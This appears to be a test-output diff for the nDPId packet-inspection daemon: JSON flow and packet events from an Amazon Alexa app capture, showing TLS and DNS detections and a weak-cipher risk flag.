+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114921,"flow_last_seen":1490976114921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1490976114921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114921,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87MtAAEAGWiOsECrYNF7ohrKjAbuMuIf\/AAAAAKAC\/\/8e8QAAAgQFtAQCCAoA9ms0AAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114940,"flow_last_seen":1490976114940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114940,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1490976114940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114940,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8CnJAAEAGPH2sECrYNF7ohrKkAbvN5GFHAAAAAKAC\/\/8EewAAAgQFtAQCCAoA9ms1AAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1490976115060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115060,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcUdAAOcGLrM0XuiGrBAq2AG7sqGNgYNXyByahHASH\/5IZwAAAgQFtAEDAwY="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOTtAAOcGZr80XuiGrBAq2AG7sqDRCzchLZ\/QY3ASH\/61sgAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwU4dAAOcGTHM0XuiGrBAq2AG7sqKEfV0Neu3xkXASH\/5t1gAAAgQFtAEDAwY="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwVCVAAOcGS9U0XuiGrBAq2AG7sqOllKPSjLiIAHASH\/5dvwAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1868,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw30dAAOcGwLI0XuiGrBAq2AG7sqRySquQzeRhSHASH\/5u1gAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1490976115065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115065,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGVU+sECrYNF7ohrKhAbvIHJqEjYGDWFAQAVeS2AAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1490976115065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115065,"pkt":"AMDKkaPvePiC0\/vCCABFAAAou1NAAEAGi6+sECrYNF7ohrKgAbstn9Bj0Qs3IlAQAVcAJAAA"} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomqNAAEAGrF+sECrYNF7ohrKiAbt67fGRhH1dDlAQAVe4RwAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7MxAAEAGWjasECrYNF7ohrKjAbuMuIgApZSj01AQAVeoMAAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoCnNAAEAGPJCsECrYNF7ohrKkAbvN5GFIckqrkVAQAVe5RwAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1490976115835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976115835,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWl5AAEARM0CsECrYrBAqAW\/GADUAQT0E1ZsBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} 00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1490976115901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976115901,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl30tAAEARrkKsECoBrBAq2AA1b8YAUeVS1ZuBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIQAENu8YtA=="} 
00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976115901,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.180"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115905,"flow_last_seen":1490976115905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976115905,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1490976115905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976115905,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JUVAAEAG7uusECrYNu8YtJKvAbsZEE7TAAAAAKAC\/\/+4mQAAAgQFtAQCCAoA9muWAAAAAAEDAwg="} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976116084,"flow_last_seen":1490976116084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976116084,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1490976116084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976116084,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8uXBAAEAGWsCsECrYNu8YtJKwAbtgAdLYAAAAAKAC\/\/\/tjwAAAgQFtAQCCAoA9muoAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1490976116119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116119,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcfNAAOcG+0g27xi0rBAq2AG7kq+qRjf5GRBO1HASH\/5e8QAAAgQFtAEDAwY="} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1490976116121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116121,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJUZAAEAG7v6sECrYNu8YtJKvAbsZEE7UqkY3+lAQAVepYgAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1490976116248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116248,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwirZAAOcG4oU27xi0rBAq2AG7krCs\/eb6YAHS2XASH\/7iQAAAAgQFtAEDAwY="} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1490976116249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116249,"pkt":"AMDKkaPvePiC0\/vCCABFAAAouXFAAEAGWtOsECrYNu8YtJKwAbtgAdLZrP3m+1AQAVcssgAA"} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 